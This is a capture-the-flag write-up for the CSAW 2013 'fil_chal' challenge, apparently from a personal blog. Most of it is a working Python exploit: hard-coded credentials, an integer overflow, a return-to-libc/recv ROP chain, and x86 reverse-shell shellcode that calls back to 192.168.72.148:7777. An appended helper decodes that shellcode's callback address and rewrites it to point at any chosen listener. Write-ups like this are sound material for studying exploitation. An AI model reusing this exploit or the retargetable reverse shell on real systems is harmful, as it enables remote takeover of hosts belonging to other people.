
Ugh.. this took forever... I solved it with an integer overflow followed by RTL (return-to-libc).

+) I need to study ROP again.


+) I wasted quite a while because of the PORT number ㅡㅡ; it turned out the port was sitting inside htons() as a hex value ㅡㅡ; I must not make this mistake again.

fil_chal


from socket import *
from struct import pack, unpack
import time

p = lambda x: pack("<L", x)         # pack a 32-bit little-endian dword
up = lambda x: unpack("<L", x)[0]   # ...and unpack one

HOST = "192.168.72.148"
PORT = 34266

# linux/x86 reverse shell that connects back to 192.168.72.148:7777
# (the port is embedded as htons(7777) = 0x1e61 in the push right after the IP)
buf =  ""
buf += "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66"
buf += "\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0"
buf += "\xa8\x48\x94\x68\x02\x00\x1e\x61\x89\xe1\xb0\x66\x50"
buf += "\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73"
buf += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0"
buf += "\x0b\xcd\x80"

free = 0x0804b000          # writable address the shellcode is received into
recv_addr = 0xf772c4e0     # recv() in libc
pr_addr = 0x80495d4        # pop;pop;pop;pop;ret gadget to discard recv()'s four arguments

offset = ''   # relative address (unused)

system_addr = 0xf75fb1f0   # got truncated when I copy-pasted it into Notepad

s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
# start here
s.recv(0x2A2)
s.recv(9)

# send credentials
s.recv(20)    # ID prompt
s.send("csaw2013")

s.recv(20)    # password prompt
s.send("S1mplePWD")

s.recv(100)   # URL

s.recv(30)    # invalid credentials...

s.send(str(0xFFFF))   # integer overflow

print s.recv(4096)
time.sleep(1)

# stage 1: fill the 0x41c-byte buffer plus saved ebp, then return into
# recv(4, free, len(buf), 0) so the shellcode sent next lands at `free`;
# the pop4;ret gadget drops the four arguments and returns to system_addr
payload = ""
payload += "\x90" * (0x41c + 4)   # buffer + saved ebp
payload += p(recv_addr)           # overwritten return address -> recv()
payload += p(pr_addr)             # recv()'s return address -> pop;pop;pop;pop;ret
payload += p(4)                   # fd
payload += p(free)                # dst
payload += p(len(buf))            # len
payload += p(0)                   # flags
payload += p(system_addr)

s.send(payload)
s.send(buf)   # stage 2: the shellcode, stored at `free` by recv()
raw_input("finally I solved by symnoisy>>")
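The port mistake above comes from the way the shellcode builds its sockaddr_in: `68 c0 a8 48 94` pushes the IP and `68 02 00 1e 61` pushes AF_INET (0x0002, little-endian) followed by the port in network byte order, i.e. htons(7777) = 0x1e61. The following is an added example, not part of the original post: it locates that push pair in the reverse-shell bytes from the script above, decodes the host and port so they can be checked before sending, and rewrites them for a different listener. The sample shellcode is the page's own; the function names are mine.

```python
import socket
import struct

# The page's linux/x86 reverse shell, copied byte for byte: connects back to
# 192.168.72.148:7777 and execve("/bin//sh").
SHELLCODE = (
    b"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66"
    b"\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0"
    b"\xa8\x48\x94\x68\x02\x00\x1e\x61\x89\xe1\xb0\x66\x50"
    b"\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73"
    b"\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0"
    b"\x0b\xcd\x80"
)

PUSH_IMM32 = 0x68          # x86 opcode: push imm32
SOCKADDR_LEN = 10          # two 5-byte push imm32 instructions


def find_sockaddr(shellcode):
    """Offset of the `push <ip>` that starts the sockaddr_in build-up.

    The pattern is two consecutive `push imm32`, the second one beginning
    with 02 00 (sin_family = AF_INET as a little-endian word). Raises
    ValueError if the shellcode does not contain it.
    """
    for i in range(len(shellcode) - SOCKADDR_LEN + 1):
        if (shellcode[i] == PUSH_IMM32
                and shellcode[i + 5] == PUSH_IMM32
                and shellcode[i + 6:i + 8] == b"\x02\x00"):
            return i
    raise ValueError("no AF_INET sockaddr_in push sequence found")


def get_reverse_target(shellcode):
    """Return (ip, port) the shellcode connects back to."""
    off = find_sockaddr(shellcode)
    ip = socket.inet_ntoa(shellcode[off + 1:off + 5])
    # sin_port is stored in network byte order (htons), hence "!H"
    (port,) = struct.unpack("!H", shellcode[off + 8:off + 10])
    return ip, port


def set_reverse_target(shellcode, ip, port):
    """Return a copy of the shellcode pointed at ip:port, same length."""
    if not 0 < port <= 0xFFFF:
        raise ValueError("port out of range")
    off = find_sockaddr(shellcode)
    patch = (bytes([PUSH_IMM32]) + socket.inet_aton(ip)
             + bytes([PUSH_IMM32, 0x02, 0x00]) + struct.pack("!H", port))
    return shellcode[:off] + patch + shellcode[off + SOCKADDR_LEN:]


if __name__ == "__main__":
    print("shellcode calls back to %s:%d" % get_reverse_target(SHELLCODE))
```

Checking `get_reverse_target(buf)` against the listener you actually started is the one-line sanity test that would have caught the htons mix-up; note that the AF_INET word already puts a 0x00 into the shellcode, so a patched port containing a null byte is no worse than the original when the payload is delivered with recv().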


+) pwnable.kr dragon: I know what I should solve it with, but I still don't have a feel for it.

